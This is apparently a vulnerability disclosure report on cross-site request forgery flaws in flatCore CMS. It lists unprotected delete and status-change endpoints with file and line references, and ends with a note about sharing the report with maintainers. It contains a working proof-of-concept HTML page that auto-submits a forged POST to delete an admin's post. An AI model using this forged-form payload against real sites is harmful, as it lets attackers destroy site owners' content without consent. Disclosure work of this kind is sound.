Cross-Site Request Forgery (CSRF) in flatcore/flatcore-cms
Reported on
Oct 11th 2021
Description
- Missing CSRF token in delete posts and delete folder in the frontend
- Missing backend CSRF validation in 1) removing and enabling fix status and 2) deleting posts, and 3) delete folder and 4) del_exclude in the indexing page (see Permalinks)
- Delete cache
Proof of Concept
Open in index.html
<html>
<body>
<form action="http://[FLATCORE-IP]/flatCore-CMS/acp/acp.php?tn=posts" method="POST">
<input type="hidden" name="delete_id" value="2" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
Attackers can trick admin users into deleting posts and changing fix status.
Occurrences
dashboard.top.php L6L15
delete cache backend
posts.list.php L11L31
missing delete post validation backend
dashboard.top.php L290
delete_cache frontend
files.browser.php L609L617
missing delete folder frontend
files.browser.php L191L210
missing delete folder backend
pages.index.php L428L438
missing delete element frontend
posts.list.php L38L46
removed fixed backend
posts.list.php L50L59
set fixed backend
SECURITY.md
a year ago
Hi @admin, maintainer says he will take time to post the SECURITY.md, https://github.com/flatCore/flatCore-CMS/issues/70, if possible, could you help me by posting the report links there? Thanks!
@haxatron - feel free to share the report URLs on the Github issue that has been created. You are always welcome to share these reports, as the maintainers that view them will be authorised to view.
If the maintainers prefer not to sign up, we request the SECURITY.md so that we can send a magic URL, giving them access, to their elected email address.
